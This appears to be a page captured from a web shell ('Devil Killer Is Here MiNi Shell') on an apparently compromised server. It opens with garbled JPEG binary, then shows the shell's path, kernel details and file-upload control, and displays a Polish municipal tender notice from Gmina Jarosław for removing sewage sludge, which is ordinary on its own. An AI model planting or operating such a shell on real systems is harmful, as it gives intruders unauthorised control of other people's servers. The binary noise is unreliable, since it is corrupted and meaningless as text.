JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241203/0063000101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Załadunek, wywóz i zagospodarowanie odwodnionych, ustabilizowanych osadów ściekowych z oczyszczalni ścieków zlokalizowanych na terenie Gminy Jarosław </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Jarosław</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650900482</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piekarska 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jarosław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@ug.jaroslaw.pl.</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://gminajaroslaw.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Załadunek, wywóz i zagospodarowanie odwodnionych, ustabilizowanych osadów ściekowych z oczyszczalni ścieków zlokalizowanych na terenie Gminy Jarosław </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-05534fd6-7f79-4727-a8ad-c2d1957ad335</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00630001</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00009545/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Załadunek, wywóz i zagospodarowanie odwodnionych, ustabilizowanych osadów ściekowych z oczyszczalni ścieków zlokalizowanych na terenie Gminy Jarosław</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/jaroslaw <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/jaroslaw</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">:Oferta składana jest pod rygorem<br/>nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Do oferty<br/>Wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu w zakresie<br/>wskazanym przez zamawiającego w pkt 15 i 16 SWZ - zgodne ze wzorem stanowiącym załącznik nr 2 do SWZ (art. 125 ust. 1<br/>ustawy Pzp). Oświadczenie to stanowi dowód potwierdzający brak podstaw do wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe. Komunikacja w<br/>postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń<br/>między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp., odbywa się przy użyciu środków<br/>komunikacji elektronicznej za pośrednictwem Platformy dostępnej na stronie profilu nabywcy<br/>https://platformazakupowa.pl/pn/jaroslaw. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej<br/>zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r., poz. 344). Zgodnie z § 11<br/>Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie oraz zgodnie z art. 67 ustawy p.z.p., Zamawiający podaje wymagania techniczne związane z<br/>korzystaniem z Platformy: 1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, 2) komputer<br/>klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z<br/>systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, 3) zainstalowana dowolna przeglądarka<br/>internetowa, w przypadku Internet Explorer minimalnie wersja 10 0., 4) włączona obsługa JavaScript, 5) zainstalowany program<br/>Adobe Acrobat Reader lub inny obsługujący format plików .pdf, 6) Platformazakupowa.pl działa według standardu przyjętego w<br/>komunikacji sieciowej - kodowanie UTF8, 7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz<br/>dokładny czas (hh:mm:ss) generowany wg. Czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być<br/>zgody z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452) oraz<br/>Rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r., poz. 2415) .<br/>Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to<br/>skutkować naruszeniem integralności plików co równoważne będzie z koniecznością odrzucenia oferty w postępowaniu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">30.1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych <br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>30.1.1.	Administratorem Pani/Pana danych osobowych jest: Wójt Gminy Jarosław, <br/>ul. Piekarska 5, 37-500 Jarosław <br/>30.1.2.	Administrator wyznaczył Inspektora Ochrony Danych (IOD). Kontakt z Inspektorem Ochrony Danych - iod@jaroslaw.itl.pl, telefonicznie pod numerem: 16 624 86 33, listownie na adres Urzędu Gminy Jarosław, kontakt osobisty w siedzibie Urzędu <br/>30.1.3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: „Załadunek, wywóz i zagospodarowanie odwodnionych, ustabilizowanych osadów ściekowych <br/>z oczyszczalni ścieków zlokalizowanych na terenie Gminy Jarosław” prowadzonym w trybie podstawowym bez negocjacji. <br/>30.1.4.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu ustawę Pzp, <br/>30.1.5.	Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia publicznego, <br/>30.1.6.	Niezależnie od postanowień ppkt 30.1.5. powyżej, w przypadku zawarcia umowy w sprawie zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego, <br/>30.1.7.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp, <br/>30.1.8.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; <br/>30.1.9.	Posiada Pani/Pan: <br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; <br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **; <br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO <br/>***; <br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>30.1.10. Nie przysługuje Pani/Panu: <br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>30.1.11. Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących zadania realizowane w interesie publicznym lub w ramach sprawowania władzy publicznej, w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane osobowe są przekazywane do podmiotów przetwarzających dane w imieniu administratora danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UG.271.12.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszego zamówienia jest: wykonanie zadania pn. „Załadunek, wywóz i zagospodarowanie odwodnionych, ustabilizowanych osadów ściekowych z oczyszczalni ścieków zlokalizowanych na terenie Gminy Jarosław ”<br/>Prace, o których mowa powyżej należy prowadzić w kolejności umożliwiającej bezpieczny wywóz i składowanie materiałów oraz przy maksymalnej ostrożności.<br/>Przedmiotem zamówienia jest sukcesywne: załadunek, wywóz (transport) i zagospodarowanie odwodnionych, ustabilizowanych osadów ściekowych (kod 19 08 05) z dwóch oczyszczalni ścieków zlokalizowanych na terenie gminy Jarosław: w Kostkowie oraz w Tuczempach. <br/>Wykonawca będzie zobowiązany do realizacji następujących zadań; <br/>	sukcesywnego dostarczania (podstawiania) własnego kontenera na osady na właściwą oczyszczalnię ścieków pod załadunek mechaniczny przenośnikiem ślimakowym z prasy taśmowej, <br/>	załadunku kontenera z osadem na własny środek transportu,<br/>	wywozu osadów ściekowych z terenu oczyszczalni do miejsca jego zagospodarowania - przetwarzania (z wyłączeniem zagospodarowania osadów w gruncie) zgodnie z posiadaną decyzją na przetwarzanie odpadów, z zachowaniem wymogów określonych przepisami: <br/>•	ustawy z dnia 14 grudnia 2012 r. o odpadach, <br/>•	rozporządzenia Ministra Środowiska z dnia 6 lutego 2015 r. w sprawie komunalnych osadów ściekowych, <br/>•	ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska,<br/>	przyjęcia odpowiedzialności za dalszy sposób postępowania z przedmiotowymi osadami zgodnie z przedstawionym sposobem i miejscem ich zagospodarowania oraz ponieść wszelkie konsekwencje prawne i finansowe z tym związane, <br/>	każdorazowo rozliczać ilość wywożonych osadów na podstawie kart przekazania odpadu w rejestrze BDO. <br/><br/>Ustabilizowany komunalny osad ściekowy (kod: 19 08 05) pochodzi z procesów oczyszczania ścieków komunalnych na dwóch oczyszczalniach ścieków: w Kostkowie (adres: Kostków 95A) oraz w Tuczempach (adres: Tuczempy , ul. Sanowa 21).<br/>Wytworzony osad, po biologicznej stabilizacji tlenowej poddawany jest na obu oczyszczalniach procesowi odwadniania na prasach taśmowych.<br/>Przewidywana, łączna ilość wytworzonego odwodnionego osadu w okresie objętym zamówieniem (z dwóch oczyszczalni) – ok. 600 Mg (z tego ok. 60 % z oczyszczalni w Tuczempach i ok. 40 % z oczyszczalni w Kostkowie).<br/>Przewidywana ilość odwodnionego osadu do odbioru i zagospodarowania przez Wykonawcę - ok. 600 Mg.<br/>Przewidywana, średnia ilość osadu w miesiącu - ok. 50 Mg/ m-c.<br/>Zawartość suchej masy w osadzie - ok. 14 - 18 %.<br/>Zamawiający zastrzega sobie prawo do zmiany ilości wywożonych osadów oraz okresów odbioru z przyczyn spowodowanych przestojami lub awariami.<br/>Osady poddawane są badaniom z częstotliwością i w zakresie zgodnym z rozporządzeniem Ministra Środowiska z dnia 6 lutego 2015 r. w sprawie komunalnych osadów ściekowych.<br/>Załadunek i odbiór osadu prowadzony będzie w zależności od potrzeb, średnio – łącznie z dwóch oczyszczalni, ok. 6-7 razy w ciągu miesiąca.<br/>Poprzedzi go trwający ok. 2 doby proces odwadniania na prasie i zarazem mechaniczny załadunek kontenera). Osad będzie w procesie ciągłym transportowany przenośnikiem ślimakowym do podstawionego kontenera. Wylot przenośnika zlokalizowany jest na wys. ok. 2,1 m nad poziomem posadzki.<br/>Ze względu na wymiary pomieszczeń na kontener, wymagane maksymalne wymiary kontenera (dług. x szer. x wys.) wynoszą: 5,20 x 2,2 x 1,6 m, ilość jednorazowo załadowanego do kontenera osadu, ok. 6-7 Mg osadu.<br/><br/>O terminie podstawienia kontenera na odpowiednią oczyszczalnię Zamawiający powiadomi Wykonawcę telefonicznie lub pocztą elektroniczną, co najmniej z 3-dniowym wyprzedzeniem.<br/><br/>Odzysk lub unieszkodliwianie ustabilizowanych osadów ściekowych powinno odbywać się zgodnie z zasadami postępowania z odpadami określonymi w obowiązujących przepisach ustawy z dnia 14 grudnia 2012 r. o odpadach oraz przepisach wykonawczych do tej ustawy.<br/><br/>Wykonawca zobowiązuje się do przedstawienia, na każde żądanie Zamawiającego, dokumentu potwierdzającego prawo do dysponowania nieruchomością, na której składowane lub magazynowane lub stosowane są osady będące przedmiotem niniejszej umowy.<br/><br/>Wykonawca ponosi pełną odpowiedzialność za zniszczenia i zanieczyszczenia odnośnie ruchomości i nieruchomości osób trzecich, a także Zamawiającego, spowodowane swoim działaniem lub zaniechaniem związanym z realizacją niniejszego zamówienia.<br/><br/>Wykonawca przyjmuje na siebie całkowitą odpowiedzialność faktyczną, prawną i finansową związaną z realizacją przedmiotu umowy w tym z gospodarczym wykorzystaniem przedmiotowych osadów ściekowych w wyznaczonym miejscu, a zwłaszcza wynikającą z przepisów ochrony środowiska. Odpowiedzialność ta rozpoczyna się od momentu załadunku odpadów na środki transportu Wykonawcy lub przez niego wskazane, w miejscu na terenie danej oczyszczalni ścieków. Z tą chwilą Wykonawca staje się posiadaczem odpadów i obciążony zostaje wszelkimi obowiązkami wynikającymi z ustawy z dnia 14 grudnia 2012 r. o odpadach i ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska w szczególności dotyczącymi transportu, odzysku lub unieszkodliwiania.<br/><br/>Wykonawca zapewni szczelny (niepowodujący wycieków), posiadający odpowiednią ładowność i wytrzymałość przystosowaną do wywozu (transportu) osadów, zabezpieczony przed wypadaniem lub wywiewaniem i niekorzystnym działaniem warunków atmosferycznych, transport osadów ściekowych zgodnie z art. 24 ustawy z dnia 14 grudnia 2012 r. o odpadach. Załadunek i transport muszą być zgodne z obowiązującymi przepisami a w szczególności z ustawą z dnia 6 września 2001 r. o transporcie, ustawą z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym i rozporządzeniem Ministra Infrastruktury z dnia 31.12.2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia.<br/><br/>Wykonawca w oparciu o wystawione przez zamawiającego kwity wagowe oraz potwierdzony transport i przejęcie odpadów przez Zamawiającego wystawi fakturę zbiorczą. Wykonawca będzie wystawiał faktury ostatniego dnia każdego miesiąca. Faktura powinna uwzględniać wszystkie kwity wagowe z danego miesiąca. Faktura powinna w osobnych pozycjach wyszczególniać wagi odebranych osadów z dwóch oczyszczalni (osobna pozycja dla oczyszczalni) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90000000-7 - Usługi odbioru ścieków, usuwania odpadów, czyszczenia/sprzątania i usługi ekologiczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90513700-3 - Usługi transportu osadów</p> <p class="mb-0">90513800-4 - Usługi obróbki osadów</p> <p class="mb-0">90513900-5 - Usługi likwidacji osadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">24.1.	Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów: <br/> <br/>Lp. Opis kryterium oceny Znaczenie (%) <br/>1. Cena 60 % <br/>2. Dysponowanie pojazdami do świadczenia usługi o określonej normie emisji spalin	40 % <br/> Razem 100 % <br/> <br/>24.2.	Oferty będą oceniane przez komisję przetargową metodą punktową w skali punktowej. <br/>CENA – 60 % <br/>Cena będzie oceniana metodą punktową wg wzoru: <br/>Cena najniższa ze wszystkich ofert x 100pkt x Znaczenie kryterium 60 % Cena oferty badanej <br/>Oferta może otrzymać maksymalnie 60 pkt (1 % = 1 pkt) w zakresie kryterium ceny. <br/><br/>24.3.	Kryterium DYSPONOWANIE POJAZDAMI DO ŚWIADCZENIA USŁUGI <br/>O OKREŚLONEJ NORMIE EMISJI SPALIN<br/>Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium DYSPONOWANIE POJAZDAMI DO ŚWIADCZENIA USŁUGI O OKREŚLONEJ NORMIE EMISJI SPALIN <br/>a.	Ofertom zostaną przyznane punkty na podstawie podanego (zadeklarowanego) przez Wykonawcę w Formularzu ofertowym DYSPONOWANIE POJAZDAMI DO ŚWIADCZENIA USŁUGI O OKREŚLONEJ NORMIE EMISJI SPALIN – liczba punktów możliwych <br/>do uzyskania – 40 pkt., <br/>b.	Oferta, w zależności od zadeklarowanego (podanego w Formularzu ofertowym) DYSPONOWANIE POJAZDAMI DO ŚWIADCZENIA USŁUGI O OKREŚLONEJ NORMIE EMISJI SPALIN – uzyska w tym kryterium odpowiednią ilość punktów zgodnie z poniższym zestawieniem: <br/>1)	dysponowanie pojazdami o normie emisji spalin EURO 8- 40 pkt<br/>2)	dysponowanie pojazdami o normie emisji spalin EURO 7 - 30 pkt <br/>3)	dysponowanie pojazdami o normie emisji spalin EURO 6 - 20 pkt <br/>4)	dysponowanie pojazdami o normie emisji spalin EURO 5 - 10 pkt<br/>5)	dysponowanie pojazdami o normie emisji spalin EURO 4 - 0 pkt<br/>W przypadku zaproponowania przez Wykonawcę DYSPONOWANIA POJAZDAMI <br/>DO ŚWIADCZENIA USŁUGI O OKREŚLONEJ NORMIE EMISJI SPALIN poniżej normy EURO 4 jego oferta zostanie odrzucona. <br/> <br/>24.4. Łączna liczba punktów za ofertę = liczba punktów za cenę brutto (maks. 60) + liczba <br/>punktów za kryterium DYSPONOWANIE POJAZDAMI DO ŚWIADCZENIA USŁUGI O OKREŚLONEJ NORMIE EMISJI SPALIN (maks. 40) <br/>Opis sposobu obliczenia łącznej oceny ofert: <br/>24.4.1.Łączna ocena punktowa (P) oferty zostanie obliczona według formuły P = PC + CR 